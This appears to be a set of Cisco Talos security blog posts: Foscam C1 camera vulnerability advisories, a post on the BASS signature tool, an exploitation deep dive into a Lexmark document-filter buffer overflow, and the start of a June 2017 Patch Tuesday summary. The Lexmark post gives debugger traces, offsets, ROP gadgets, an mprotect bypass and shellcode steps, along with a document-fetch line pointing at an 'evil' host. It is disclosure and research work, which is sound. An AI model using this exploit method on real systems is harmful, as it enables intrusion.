Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the "msmtprc" configuration file on the device, resulting in the execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the "smtpTest" command and injecting commands into the "SMTP Test User" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0344 has been assigned CVE-2017-2842. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi SMTP Test Password Parameter Configuration Command Injection Vulnerability (TALOS-2017-0345 / CVE-2017-2843)

Vulnerability Discovered by Claudio Bozzato of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the "msmtprc" configuration file on the device, resulting in the execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the "smtpTest" command and injecting commands into the "SMTP Test Password" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0345 has been assigned CVE-2017-2843. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi SMTP Test Sender Parameter Configuration Command Injection Vulnerability (TALOS-2017-0346 / CVE-2017-2844)

Vulnerability Discovered by Claudio Bozzato of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the "msmtprc" configuration file on the device, resulting in the execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the "smtpTest" command and injecting commands into the "SMTP Test Sender" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0346 has been assigned CVE-2017-3844. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi SMTP Test Command Injection Vulnerability (TALOS-2017-0347 / CVE-2017-2845)

Vulnerability Discovered by Cory Duplantis and Claudio Bozzato of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands during the SMTP configuration testing process. This vulnerability can be reached by invoking the "smtpTest" command and injecting attacker specified operating system commands. A specially crafted HTTP request can be used to exploit this vulnerability. This vulnerability requires an attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0347 has been assigned CVE-2017-2845. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi Gateway Address Configuration Command Injection Vulnerability (TALOS-2017-0348 / CVE-2017-2846)

Vulnerability Discovered by Claudio Bozzato of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with manual networking configuration. This vulnerability can be reached by invoking the "setIpInfo" command and injecting commands into the "Gateway Address" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0348 has been assigned CVE-2017-2846. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi DNS1 Address Configuration Command Injection Vulnerability (TALOS-2017-0349 / CVE-2017-2847)

Vulnerability Discovered by Claudio Bozzato of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with manual networking configuration. This vulnerability can be reached by invoking the "setIpInfo" command and injecting commands into the "DNS1" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0349 has been assigned CVE-2017-2847. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi DNS2 Address Configuration Command Injection Vulnerability (TALOS-2017-0350 / CVE-2017-2848)

Vulnerability Discovered by Claudio Bozzato of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with manual networking configuration. This vulnerability can be reached by invoking the "setIpInfo" command and injecting commands into the "DNS2" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0350 has been assigned CVE-2017-2848. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi NTP Server Configuration Command Injection Vulnerability (TALOS-2017-0351 / CVE-2017-2849)

Vulnerability Discovered by Claudio Bozzato of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with NTP server address configuration. This vulnerability can be reached by invoking the "setSystemTime" command and injecting commands into the "ntpServer" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0351 has been assigned CVE-2017-2849. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi Change Username pureftpd.passwd Injection Vulnerability (TALOS-2017-0352 / CVE-2017-2850)

Vulnerability Discovered by Claudio Bozzato of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to an injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the "pureftpd.passwd" configuration file on the device during a username change operation, enabling the attacker to break out of the chroot environment associated with the FTP service on the device. This vulnerability could be used to escalate privileges on affected devices. This vulnerability is reachable by invoking the "changeUserName" command and requires an attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0352 has been assigned CVE-2017-2850. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi Wifi Settings Code Execution Vulnerability (TALOS-2017-0353 / CVE-2017-2851)

Vulnerability Discovered by Claudio Bozzato of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a stack based buffer overflow vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability can be exploited using a specially crafted HTTP request during the WiFi configuration on the device. This vulnerability could allow an attacker to overwrite the buffer and potentially lead to remote code execution on affected devices. This vulnerability is reachable by invoking the "setWifiSetting" command. Exploitation of this vulnerability requires an attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0353 has been assigned CVE-2017-2851. For additional information, please see the advisory here.

Versions Tested

Talos has tested and confirmed that the following Foscam firmware versions are affected:

Foscam, Inc. Indoor IP Camera C1 Series
System Firmware Version: 1.9.3.17
Application Firmware Version: 2.52.2.37
Web Version: 2.0.1.1
Plug-In Version: 3.3.0.5

Conclusion

One of the most commonly deployed IP cameras is the Foscam C1. In many cases these devices may be deployed in sensitive locations. They are marketed for use in security monitoring and many use these devices to monitor their homes, children, and pets remotely. As such, it is highly recommended that the firmware running on these devices be kept up-to-date to ensure the integrity of the devices, as well as the confidentiality of the information and environments that they are monitoring. Foscam has released a firmware update, version V-2.x.2.43 to resolve these issues. Users of the affected devices should update to this new version as quickly as is operationally feasible to ensure that their devices are not vulnerable.

Coverage

The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rules:
40908-40909
42078
42431-42437
43005
43061

BASS - BASS Automated Signature Synthesizer

noreply@blogger.com (Alexander Chiu) — Mon, 19 Jun 2017 02:41:00 PDT

This blog post was authored by Jonas Zaddach and Mariano Graziano.

Executive Summary

Given the rapid pace of change in the threat landscape with new threats emerging and existing ones evolving, there are bound to be challenges defenders face. These challenges can manifest in multiple ways, such as processing and analyzing millions of new and unknown samples received each day. Other challenges include managing resource constraints for our tools used to automate malware analysis, developing antivirus signatures in an efficient manner that will identify malware families, and ensuring tools are able to scale as the number of samples needing to be analyzed increases. To help address these challenges, Talos is releasing a new open source framework called BASS.

BASS (pronounced "bæs") is a framework designed to automatically generate antivirus signatures from samples belonging to previously generated malware clusters. It is meant to reduce resource usage of ClamAV by producing more pattern-based signatures as opposed to hash-based signatures, and to alleviate the workload of analysts who write pattern-based signatures. The framework is easily scalable thanks to Docker.

Please note that this framework is still considered in the Alpha stage and as a result, it will have some rough edges. As this tool is open source and actively maintained by us, we gladly welcome any feedback from the community on improving the functionality of BASS. You can find source code for BASS here:

https://github.com/Cisco-Talos/bass

BASS was announced at REcon 2017 in Montreal, Canada.

Motivation

Talos receives about 1.5 million unique samples per day. While most of these samples are known threats that can be filtered out with a malware scan (with ClamAV) right away, a good portion of files remain where further analysis is necessary. At this point, we perform dynamic analysis on this subset where those files will be run in our sandbox, and then be classified as malicious or not malicious. The remaining portion of malicious files need to be processed further to generate ClamAV signatures which will filter this threat in the earlier stage malware scan in the future.

ClamAV's database increased by about 560,000 signatures in a three-month period (February to April) in 2017, which amounts to 9,500 signatures daily. A large part of these signatures are generated automatically as hash-based signatures. Compared to pattern-based or bytecode-based signatures (the other two main signature types which ClamAV supports), hash-based signatures have the disadvantage of only matching a single file per signature. Additionally, a high number of signatures translates to an increased footprint of ClamAV's signature database in memory. For this reason, we would prefer to have have more pattern-based signatures, which are comparably faster and easier to maintain than bytecode signatures, but are able to identify a whole cluster of files instead of just a single file.

BASS

BASS is meant to fill this gap. This framework is designed to generate ClamAV pattern signatures from chunks of binary executable code.

The framework ingests malware clusters. To keep the framework as simple and as flexible as possible, malware clustering is not part of BASS. The input interface is intentionally kept generic to be easily adaptable to new clustering sources. We currently use several cluster sources. A non-exhaustive list of our current sources is: Indicator of Compromise (IoC) clusters from our sandbox, structural hashing in case where we have a known malicious executable and find additional samples through structural similarity, and malware gathered from spam campaigns.

In a first step, the malware files are unpacked with ClamAV's unpackers. ClamAV can unpack and extract a wide range of archive formats, but also packed executables (like UPX) and nested documents (such as an EXE file inside a Word document). The resulting artifacts are inspected to gather information. Currently we use the file size and the magic string from the Unix file tool in the filtering step.

Next, the malware cluster is filtered. If files do not correspond to BASS' expected input (currently PE executables, though adding support for ELF and MACH-O binaries is trivial), they are removed from the cluster, or the cluster is outright rejected if not enough files remain.

The filtered cluster then passes to the signature generation step. Here, the binaries are first disassembled. Currently we use IDA Pro as a disassembler, but other disassemblers like radare2 are able to produce the same information and could easily be swapped in as a replacement to IDA.

After disassembly, we need to find common code between the samples which can be used to generate signatures from. This step is necessary for two reasons.The first is because the signature generation algorithm is computationally very expensive and works well on short chunks. The second is because having a signature on code which is not only syntactically but also semantically similar is preferable. We use BinDiff as a code comparison tool. Again, the tool should be easily exchangeable, and we might integrate other comparison tools in the future.

BinDiff compares each executable with every other in small clusters. In bigger clusters, comparisons are limited, as the number would explode. A graph is built from the function similarities where functions are the nodes and the similarity the edges. Finding a good common function amounts to finding a connected subgraph with high overall similarity.

In the above example, the subgraph of ƒ1, ƒ2, ƒ4, ƒ6 is a good candidate for a common function, as the overall similarity is high.

When a set of candidate functions in the binaries have been identified, the functions are checked against a function whitelist. This step helps to avoid generating signatures on benign library functions which have been statically linked into a sample. These functions are submitted to the Kam1n0 instance, whose database we previously pre-populated with functions of known clean samples. If a clone of a function is found, the subgraph selection from above is repeated for the next-best subgraph. Otherwise, the function set is retained for the next step: signature generation.

At this point, the actual signature generation can start. As ClamAV's pattern signatures are made to recognize subsequences in binary data, we apply an algorithm to all extracted functions to find the Longest Common Subsequence (LCS) between them (See the Appendix for the differences between a Longest Common Substring and a Longest Common Subsequence).

As the algorithm is already computationally expensive for two samples and even more so for several samples, we implemented a heuristic version described by C. Blichmann. An example output could look like that:

Finally, the signature needs to be tested before it is published. We automatically validate the signature against our false positive test set. For further scrutiny, we use Sigalyzer, a new functionality of our CASC IDA Pro ClamAV signature generation and analysis plugin (which will be updated later). Sigalyzer highlights the matched parts of a binary given a ClamAV signature triggering on that binary, and quickly gives the analyst a visual impression of the signature.

Architecture

BASS is implemented as a cluster of docker containers. The framework is written in python, and interacts with the tools it uses through web services. The architecture is inspired from VxClass, which also used IDA Pro and BinDiff to generate ClamAV signatures, but was discontinued and, contrary to BASS, is not publicly available.

Limitations

BASS will only work on binary executables because the signature is generated from the code section of the sample. Additionally, BASS will only analyze x86 and x86_64 binaries. Support for other architectures may be added in the future.

We have observed that the framework does not work well on file infectors, which usually insert small and highly varying snippets of code in a host binary, and backdoors, which contain large amounts of (sometimes stolen) non-malicious binary code together with some malicious functions. We are working on improving the clustering step to deal with these issues.

Finally, be aware that BASS is currently in Alpha stage and has some rough edges. Still, we hope to contribute to the community by open sourcing the framework and would gladly welcome any feedback and improvement suggestions.

Appendix

Longest Common Substring versus Longest Common Subsequence

The following graphic illustrates the difference between a Longest Common Substring and a Longest Common Subsequence. In this blog post, we refer to the Longest Common Subsequence as LCS.

Deep dive in Lexmark Perceptive Document Filters Exploitation

noreply@blogger.com (Nick Biasini) — Wed, 14 Jun 2017 11:41:00 PDT

This post authored by Marcin Noga with contributions from Nick Biasini

Introduction

Talos discovers and releases software vulnerabilities on a regular basis. We don't always publish a deep technical analysis of how the vulnerability was discovered or its potential impact. This blog will cover these technical aspects including discovery and exploitation. Before we deep dive into the technical aspects of exploitation, let's start with an introduction to Lexmark Perceptive Document Filters and MarkLogic. Specifically, how these products are connected and what their purpose is. There are articles across the Internet discussing these products and their purposes. Additionally, you can read the Perceptive Documents Filters product description directly.

In general Perceptive Document Filters are used in Big Data, eDiscovery, DLP, email archival, content management, business intelligence, and intelligent capture. There are 3 major companies with product offerings in this space. Lexmark is one of them with Oracle and HP being the other two.

Perceptive Document Filters are a set of libraries used to parse massive amounts of different types of file formats for multiple different purposes, some of which are listed above. As you can imagine being such a big player in the market increases the impact of a discovered vulnerability in this product. Examples of direct Lexmark solution clients are all over, one example of which can be found here.

The company's customers include large organizations. The size and diversity of their clients was one of the reasons Talos decided to dive deeply on not just the vulnerability discovery process but also the details of the exploitation.

An example of an affected product using Perceptive Filters is the Enterprise NoSQL database by MarkLogic. The combination of the way MarkLogic uses Lexmarks solution and the lack of basic mitigation techniques make MarkLogic a prime candidate to demonstrate the vulnerability and its impact.

MarkLogic Impact

Before we get too deep into the technical aspects, a video demonstrating a working remote code execution exploit tested on MarkLogic 8.04 Linux x64:

MarkLogic is just one of many products thatare using Lexmark's Perceptive Document Filters as a solution to extract metadata from different types of documents. We can find both the Perceptive Document Filters libraries as well as the converter binary in the Marklogic directory as shown below:

icewall@ubuntu:~$ ls -l /opt/MarkLogic/Converters/cvtisys/
total 154612
-rwxr-xr-x 1 root root 188976 convert
drwxr-xr-x 2 root root 4096 fonts
-rwxr-xr-x 1 root root 45568 libISYS11df.so
-rwxr-xr-x 1 root root 47818992 libISYSautocad.so
-rwxr-xr-x 1 root root 9575776 libISYSgraphics.so
-rwxr-xr-x 1 root root 12376664 libISYSpdf6.so
-rwxr-xr-x 1 root root 11419576 libISYSreadershd.so
-rwxr-xr-x 1 root root 5389896 libISYSreaders.so
-rwxr-xr-x 1 root root 30264056 libISYSshared.so

The first question we need to answer is how to force MarkLogic to use this converter.

MarkLogic uses this converter everytime the XDMP API "document-filter" is used.From documentation we know that this API filters a variety of document formats, extracts metadata and text, and returns XHTML. The extracted text has very little formatting, and is typically used for searching, classification, or other text processing. An example of the usage of this particular API is shown below and demonstrates the extraction of metadata from an untrusted source document.

xdmp:document-filter(xdmp:http-get("http://www.evil.localdomain/malicious.xls")[2])

When the above "document-filter" API is called, the MarkLogic daemon spawnsthe "convert" binary which usesthe Perceptive Document Filters libraries,which are responsible for pulling the metadata out from the referenced file.

Increased damage

Monitoring the 'convert' process when it gets spawned by the MarkLogic daemon, shows that the process is executed with the same privileges as the parent process, meaning that it is executed as `daemon`.This dramatically increases the impact of successful exploitation because we will immediately gain access as one of the highest privileged accountson the system.

Spawned convert process run with `daemon` privileges

Recon

During the research into this product we found multiple vulnerabilities in Lexmark libs, but to demonstrate the exploitation process we decided to use TALOS-2016-0172 - Lexmark Perceptive Document Filters XLS Convert Code Execution Vulnerability. This particular vulnerability was patched on 08/06/2016. Running the `convert` binary under gdb and trying to pull out metadata from a malformed xls file we see the following:

icewall@ubuntu:~/exploits/cvtisys$ cat config/config.cfg
showhidden Visible
inputfile /home/icewall/exploits/cvtisys/poc.xls
icewall@ubuntu:~/exploits/cvtisys$ LD_LIBRARY_PATH=. gdb --args ./convert config/

After quick analysis of the above gdb state, we know that this is a classic stack based buffer overflow.Using `rr` we return to the moment where the `ret address` has been overwritten.

(rr) watch *0x7ffffffed128
Hardware watchpoint 1: *0x7ffffffed128
(rr) rc
Continuing.

Warning: not running or target is remote
Hardware watchpoint 1: *0x7ffffffed128

Ok, so we have landed inside memcpy. The next step will be to check the exact memcpy parameters used for this operation.

(rr) reverse-finish

We see all parameters, now we need to track their origins in order to determine how much control we have on them. The advisories mention that the `size` parameter is read directly from the file and points to the function name where it happens, but below we will demonstrate how to find that place using the `rr` debugger.Seeing backtrace function names we can assume that the buffer size is first passed as a parameter in the `reader::escher::MsofbtDggContainer::Handle` function. Now we use reverse-finish a couple of times to return to the place inside `reader::escher::MsofbtDggContainer::Handle` where `ISYS_NS::CDataReader::Read` is called.

Here we see the memcpy `size` argument in the RDX register and also the place where it has been set:

0x7ffff36185fa: mov edx,DWORD PTR [rsi+0x4]

Next we return back to the address `0x7ffff36185fa` by leveraging 'rni'. Now checking the memory content pointed by `rsi+0x4` gives us :

(rr) hexdump $rsi+0x4

0x00007ffffffed144 : 00 03 00 00 00 12 00 00 00 00 00 00 00 00 00 00 ................

As expected we have found the value of interest. Now we set a watchpoint on it and see where it has been set:

(rr) watch *0x00007ffffffed144

Hardware watchpoint 4: *0x00007ffffffed144

(rr) pdisass

Now we clearly see that memcpy `size` argument is indeed directly read from file via the `common::StreamReader::readInt32` function inside `common::read_MSOFBH` and it is a 32-bit integer value. Looking for this value in the file returns too many offsets. However, using a chain of values returned by all of these `readIntXX` functions givesus a direct offset of our `size` parameter location:

common::StreamReader::readInt16(ISYS_NS::CDataReader&) -> 03 08
common::StreamReader::readInt16(ISYS_NS::CDataReader&) -> 16 00
common::StreamReader::readInt32(ISYS_NS::CDataReader&) -> 00 30 00 00

Bingo! We see that these byte chains start at offset : 0xFCE and the `size` value param is at 0xFD2. This is confirmed when we return to the listing with the memcpy operation as shown below.

[-------------------------------------code-------------------------------------]
0x7ffff475ef59: mov rdx,r12
0x7ffff475ef5c: add rsi,rax
0x7ffff475ef5f: mov r15,r12
=> 0x7ffff475ef62: call 0x7ffff4714fc8 <memcpy@plt>
0x7ffff475ef67: mov eax,DWORD PTR [rsp+0x38]
0x7ffff475ef6b: mov rbp,r12
0x7ffff475ef6e: add rbp,QWORD PTR [r13+0x20]
0x7ffff475ef72: add DWORD PTR [rsp+0x4],ebx

Guessed arguments:
arg[0]: 0x7ffffffed020 --> 0x0
arg[1]: 0x678490 --> 0x82000165300081
arg[2]: 0x300

We noticed that `src buffer` == payload starts right after the `size` argument value at offset: 0xFD2. We will use OffVis to gain a bit more insight into the XLS structure around these values to allow for increases and make space for our gadgets and shellcode.

We have now clear view on important structure fields.

Now, one of the most important questions is whether or not we increase the value of the 'size' argument to allow for exploitation (we need more space to store our payload) while ensuring theXLS document will still be treated as valid by the Lexmark lib parser.In order to simplify this task and avoid dealing with the demanding XLS format we will create a simple script which is responsible for setting the `size` field value and according to its size overwrite original data in the file with my custom "A" string.

Through trial and error process plus observing a bit more closer xls structure around payload we managed to achieve / guess size parameter value presented above.

Now it's time to generate the payload.xls based on the template.xls file that originally caused the crash to occur.

icewall@ubuntu:~/exploits/cvtisys$ ./explo_test.py
icewall@ubuntu:~/exploits/cvtisys$ LD_LIBRARY_PATH=. ./convert test
Segmentation fault

View of generated payload.xls

We can see that the `size` field has been changed to the value set by using the script `PAYLOAD_SIZE` and the original data has been overwritten by the string of "A".

It's also notable that during our testing we noticed that when increasing the `size` value we also needed to increase the value of the `MsoDrawingGroup``Length` field, which is represented in the script as `RECORD_SIZE`.As we can see, the value from 0x300 set randomly during fuzzing process was able to be increased to 0x958 without requiring any complicated data structure modifications. The reason for this size limit is easy to seeby looking at the end of our payload block:

As shown above, we ended up overwriting original data with "A" string just before the new worksheet structure starts. References to that structure are located in the file header so if this data is overwritten the parser will fail.

Overwriting RET Address

Our next step is to determine how many bytes need to be manipulated to overwrite the return address. Now we will generate the pattern cycle using PEDA and use it instead of the string of "A":

gdb-peda$ pattern_create
Generate a cyclic pattern
Set "pattern" option for basic/extended pattern type

Usage:
pattern_create size [file]
gdb-peda$ pattern_create 0x958

When we run `convert` with that modified payload we can see the following:

Now using the pattern_offset command we get offsets of values used to overwrite the RET address but also load them in some of the registers:

gdb-peda$ pattern_offset HA%dA%3A%IA%eA%4A%JA
HA%dA%3A%IA%eA%4A%JA found at offset: 264
gdb-peda$ #EIP
gdb-peda$ pattern_offset nA%CA%-A
nA%CA%-A found at offset: 216
gdb-peda$ #RBX
gdb-peda$ pattern_offset %(A%DA%;
%(A%DA%; found at offset: 224
gdb-peda$ #RBP
(...)

We are able to fully control the return address by setting up the value at offset 264 of our payload and we can also fully control the beginning values of a few registers.We can make a simple test to determine whether the offsets we found are correct:

It's clear that everything works as expected.Taking into account that overwriting theRET address value is at offset 264 and a bigger part of the buffer is located after this offset the space left for our gadgets and shellcode equals: 0x958 - 264 = 0x850 ( 2128 ) bytes.This should allow for us to fit all necessary values and not be forced to manipulate the complicated XLS structure.

Building exploitation strategy

Before we choose one of the known methods to exploit this vulnerability we need to determine what mitigations may be implemented and used by this application and its components.

To do this we are going use checksec.sh:

We can see that the `convert` executable does not have ASLR support. The RELRO column has returned the "NO RELRO" status which means there is a writable region of memory at a fixed address where we can store data.

Unfortunately, from the attacker perspective, all components have NX compatibility which requires us to build a ROP chain to bypass it. We also can't make a simple PLT overwrite because there is not an interesting function "loaded" via PLT.Also we prefer to bind this exploit to product version instead of platform so we also reject the GOT overwrite technique. By binding to product version it supports compromise across supported platforms. We will attempt to leveragea classic stack based buffer overflow exploit by building a ROP chain based on the `convert` binary. The role of the ROP chain will be to set the stack executable (call to mprotect syscall) and then redirectcode execution flow onto the stack where our shellcode is located.

Exploitation

Finding gadgets

We will begin by looking for gadgets in the `convert` binary and for this we will use `Ropper` and `ROPgadget`. These two utilities show you some small but important details in gadgets searching scope. We will start by looking for the most important gadget -the syscall instruction.

Unfortunately, it looks like the syscall gadget is missing, so we will need to determine how to proceed. We will look one more time at the registers state when we obtain control of code execution flow.

The RAX register points to a pointer which points inside the code section of the `libISYSreadersh.so` library. This library has ASLR support, but having the register set on its code we can calculate a fixed delta :

0x7ffff375dfb0(VALUE_AVAILABLE_IN_RAX) - 0x7ffff34cf000(IMAGE_BASE) = 0x28efb0L (delta). The delta will be used later in our ROP chain to obtain the current image base of the `libISYSreadersh.so` module. By having the image base we can easily use gadgets from this library. If we look at the size of this library and compareit to `convert` library:

-rwxr-xr-x 3 icewall icewall 182K May 5 18:21 convert
-rwxr-xr-x 3 icewall icewall 12M May 5 18:21 libISYSreadershd.so

Twelve megabytes looks more promising as being a source of gadgets. A quick look for the "syscall" gadget this time ends with success:

icewall@ubuntu:~/exploits/cvtisys$ ~/tools/Ropper/Ropper.py --file libISYSreadershd.so --search "syscall"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: syscall
[INFO] File: libISYSreadershd.so
(...)

0x000000000096a0dd: syscall; ret;
(...)

Ok, we are ready to start looking for interesting gadgets in order to help us set registers, read, and write among other tasks.

Grouping gadgets

It's important to note that the `Ropper` utility does not show gadgets ending with the `retf` instruction as noted by the author. This is notable as sometimes with a limited amount of gadgets each of them has a key meaning. That's why it's good to search our binaries with differenttype of tools before we look for gadgets.

Sinceit's not a capture the flag (CTF) challenge, finding all necessary gadgets can be problematic, especially at the first stage where we are limited to the small `convert` executable file.My methodology is to have a clear picture of the gadgets that we already have anddetermine what the connections are between them. The first step is to group them into categories.

QWORD write
===============
0x0000000000415253: mov qword ptr [rbp - 0x50], rax; call qword ptr [rbx + 0x10];
(...)

QWORD read
==============
0x0000000000409ad0: mov rdx, qword ptr [rax]; mov rdi, rax; call qword ptr [rdx + 0x30];
(...)

SET register
===============
0x000000000041bf04: pop rax; ret;
0x000000000041bff1: pop rbx; ret;
0x0000000000409ad3: mov rdi, rax; call qword ptr [rdx + 0x30];
(...)

DEC DWORD PTR
==================
0x000000000042121f: dec dword ptr [rdi]; ret;
(...)

ADD reg to DWORD ptr
=======================
0x000000000040d0e3: add dword ptr [rax - 0x77], ecx; ret;
(...)

ADD DWORD ptr to reg
=====================
0x0000000000409416: add ecx, dword ptr [rax - 0x77]; ret;
(...)

That's of course just a part of discovering interesting gadgets, but hopefully demonstrates the advantages of grouping gadgets this way before attempting to create a proper ROP chain.

Preparing ROP class and primitives

We have collected as much as we could related toROP gadgets from the different categories, now we "close" them in nice primitives so building the final ROP chain will be much easier.

Now we will begin the process of building the ROP chain.

It's worth noting that we abuse the previously mentioned fact that the section headers memory area in the `convert` binary stay writable and its location is at a fixed address (See "NO RELRO" for checksec). As you can see we started using this memory area just at the beginning of ourROP chain. It's worth noting that some of the gadgets we managed to find (e.g. writeEAX) will require the preparation of a "ROP pointers" table, for example:

call [reg + xx] instruction.

To be able to use them we need to prepare a "ROP pointers" table and this memory area is perfect for accomplishing this task. Below is an example of its layout after the execution of a couple ROP gadgets.

Road map

The additional steps for creating this ROP chain are straightforward:

Dereference the address available in RAX twice to get the address pointing to the libISYSreadershd code section
Subtract the delta from this address to obtainthe libISYSreadershd IMAGE BASE
Once we have libISYSreadershd IMAGE BASE we can start using gadgets from this library
Call syscall mprotect
Stack is executable, time to redirect code execution to our shellcode
P0wn3d!!!

Shellcode and first tests

The first step is determining how much space is left in the buffer for our shellcode.

As you can see in the above image there are 136 bytes left over. For testing purpose we will use some simple "/bin/sh" shellcode that uses only 27 bytes. Finally, adding the shellcode to our ROP chain allows us to test our exploit:

Success!

Conclusion

This deep dive provides a glimpse into the process of taking a vulnerability and weaponizing it into a useable exploit. This process starts with the identification of the vulnerability and additional research into ways that it could potentially be leveraged. Finally, a deeper analysis of the environment surrounding the vulnerability is required, including mapping the address space, identification and grouping of gadgets, and finally building the ROP chain and attaching the malicious shellcode to complete the exploitation.

There is a key differentiation between vulnerability discovery and analysis. Just because a vulnerability exists does not mean it is easily weaponized. In most circumstances the path to weaponization is a long, difficult, and complicated process. However, this also significantly increases the value of the vulnerability, depending on the methodology required to actually exploit.

Microsoft Patch Tuesday - June 2017

noreply@blogger.com (Nick Biasini) — Tue, 13 Jun 2017 13:48:00 PDT

Today, Microsoft has release their monthly set of security updates designed to address vulnerabilities. This month's release addresses 92 vulnerabilities with 17 of them rated critical and 75 rated important. Impacted products include Edge, Internet Explorer, Office, Sharepoint, Skype for Business, Lync, and Windows.

Vulnerabilities Rated Critical

CVE-2017-0283

This is a remote code execution vulnerability in Windows Uniscribe related to improper handling of objects in memory. The attack can result in the attacker gaining full control of the affected system. This can be exploited through multiple vectors including viewing a specially crafted website or a user opening a specially crafted document file.

CVE-2017-0291 / CVE-2017-0292

These are remote code execution vulnerability in Microsoft Windows if a user opens a specially crafted PDF file. The attack results in potential arbitrary code execution in the context of the current user and can be exploited by having the user open a specially crafted PDF file.

CVE-2017-0294

This is a remote code execution vulnerability in Microsoft Windows related to the failure to properly handle cabinet files. This is exploitable by an attacker having a user to open a specially crafted cabinet file or spoofing a network printer and tricking the user into installing a malicious cabinet file disguised as a printer driver.

CVE-2017-8464

This is a remote code execution vulnerability related to the way that Windows Explorer handles LNK files. This vulnerability can be triggered if the icon of a specially crafted shortcut is displayed.

CVE-2017-8496 / CVE-2017-8497

CVE-2017-8499

This is a remote code execution vulnerability in the Microsoft Edge JavaScript scripting engine related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted websites.

CVE-2017-8517

This is a remote code execution vulnerability in the JavaScript engine in Microsoft browsers related to improper handling of objects in memory. Exploitation can occur through a specially crafted website resulting in the attacker gaining taking full control of the affected system.

CVE-2017-8520

This is a remote code execution vulnerability in Microsoft Edge JavaScript scripting engine related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.

CVE-2017-8522

This is a remote code execution vulnerability in the way the Javascript engines render when handling objects in memory in Microsoft browsers including both Internet Explorer and Edge. This can be exploited by a user visiting a specially crafted webpage.

CVE-2017-8524

CVE-2017-8527

This is a remote code execution vulnerability in the Windows font library related to improper handling of specially crafted embedded fonts. There are multiple ways this vulnerability can be exploited including viewing a specially crafted websites and a specially crafted document opened by the user.

CVE-2017-8528

This is a remote code execution vulnerability in Windows Uniscribe related to improper handling of objects in memory. There are multiple ways this vulnerability can be exploited including viewing a specially crafted websites and a specially crafted document opened by the user.

CVE-2017-8543

CVE-2017-8548 / CVE-2017-8549

These are remote code execution vulnerabilities in the JavaScript engines of Microsoft Browsers related to improper handling of objects in memory. This can be exploited by having a user viewing a specially crafted website.

Vulnerabilities Rated as Important

CVE-2017-0173 / CVE-2017-0215 / CVE-2017-0216 / CVE-2017-0218 / CVE-2017-0219

These are security feature bypass vulnerabilities in Device Guard that could allow the attacker to inject malicious code into a Windows PowerShell session. This can be exploited by an attacker with access to a local machine by injecting malicious code into a script that is trusted by the Code Integrity policy.

CVE-2017-0193

This is a privilege escalation vulnerability in Windows Hyper-V instruction emulation related to improper privilege level enforcement. This vulnerability could be combined with another vulnerability to take advantage of the elevated privileges while running.

CVE-2017-0260 / CVE-2017-8506

